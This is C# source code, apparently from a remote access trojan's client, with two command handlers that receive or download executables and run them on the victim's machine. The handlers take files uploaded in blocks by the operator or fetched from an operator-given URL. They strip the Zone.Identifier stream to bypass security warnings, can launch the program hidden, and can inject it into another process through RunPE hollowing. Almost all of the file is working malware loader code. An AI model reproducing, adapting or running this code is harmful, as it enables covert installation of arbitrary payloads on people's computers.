public static void HandleUploadAndExecute(Packets.ServerPackets.UploadAndExecute command, Client client)
{
string filePath = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
command.FileName);
try
{
if (command.CurrentBlock == 0 && command.Block[0] != 'M' && command.Block[1] != 'Z')
{
throw new Exception("No executable file");
}
MemorySplit destFile = new MemorySplit(filePath);
if (!destFile.AppendBlock(command.Block, command.CurrentBlock))
{
new Packets.ClientPackets.Status(string.Format("Writing failed: {0}", destFile.LastError)).Execute(
client);
return;
}
if ((command.CurrentBlock + 1) == command.MaxBlocks) // execute
{
if (command.Type == "drop")
{
if (!destFile.DropFile())
{
new Packets.ClientPackets.Status(string.Format("Drop failed: {0}", destFile.LastError)).Execute(
client);
return;
}
DeleteFile(filePath + ":Zone.Identifier");
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = command.RunHidden;
startInfo.FileName = filePath;
Process.Start(startInfo);
new Packets.ClientPackets.Status("Executed File!").Execute(client);
}
else if (command.Type == "self")
{
byte[] dat = destFile.ToByteArray();
//File.WriteAllBytes("lol.exe", dat);
if (dat == null)
{
new Packets.ClientPackets.Status("Payload was null!").Execute(client);
return;
}
//Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
//a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "self", "" } });
RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "self", "" }, client);
}
else if (command.Type == "cmd")
{
byte[] dat = destFile.ToByteArray();
if (dat == null)
{
new Packets.ClientPackets.Status("Payload was null!").Execute(client);
return;
}
//Assembly a = Assembly.Load(xClient.Properties.Resources.RunPELib);
//a.EntryPoint.Invoke(null, new object[] { new string[] { Convert.ToBase64String(dat), "sys", "cmd" } });
RunPE.Invoke(new string[] { Convert.ToBase64String(dat), "sys", "cmd" }, client);
}
else
{
new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
}
}
}
catch (Exception ex)
{
DeleteFile(filePath);
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.ToString())).Execute(client);
//MessageBox.Show(ex.ToString());
}
}
public static void HandleDownloadAndExecuteCommand(Packets.ServerPackets.DownloadAndExecute command,
Client client)
{
new Packets.ClientPackets.Status("Downloading file...").Execute(client);
new Thread(() =>
{
try
{
if (command.Type == "drop")
{
#region drop
string tempFile = Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.ApplicationData),
Helper.Helper.GetRandomFilename(12, ".exe"));
try
{
using (WebClient c = new WebClient())
{
c.Proxy = null;
c.DownloadFile(command.URL, tempFile);
}
}
catch
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
return;
}
new Packets.ClientPackets.Status("Downloaded File!").Execute(client);
try
{
DeleteFile(tempFile + ":Zone.Identifier");
var bytes = File.ReadAllBytes(tempFile);
if (bytes[0] != 'M' && bytes[1] != 'Z')
{
throw new Exception("Not an .EXE file!");
}
ProcessStartInfo startInfo = new ProcessStartInfo();
if (command.RunHidden)
{
startInfo.WindowStyle = ProcessWindowStyle.Hidden;
startInfo.CreateNoWindow = true;
}
startInfo.UseShellExecute = command.RunHidden;
startInfo.FileName = tempFile;
Process.Start(startInfo);
}
catch (Exception ex)
{
DeleteFile(tempFile);
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
return;
}
#endregion
}
else if (command.Type == "self")
{
byte[] fileBytes = Download(command.URL, client);
if (fileBytes == null)
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
}
RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "self", "" }, client);
}
else if (command.Type == "cmd")
{
byte[] fileBytes = Download(command.URL, client);
if (fileBytes == null)
{
new Packets.ClientPackets.Status("Download failed!").Execute(client);
}
RunPE.Invoke(new string[] { Convert.ToBase64String(fileBytes), "sys", "cmd" }, client);
}
else
{
new Packets.ClientPackets.Status("Unknown Injection Type!").Execute(client);
}
}
catch (Exception ex)
{
new Packets.ClientPackets.Status(string.Format("Execution failed: {0}", ex.Message)).Execute(client);
return;
}
new Packets.ClientPackets.Status("Executed File!").Execute(client);
}).Start();
}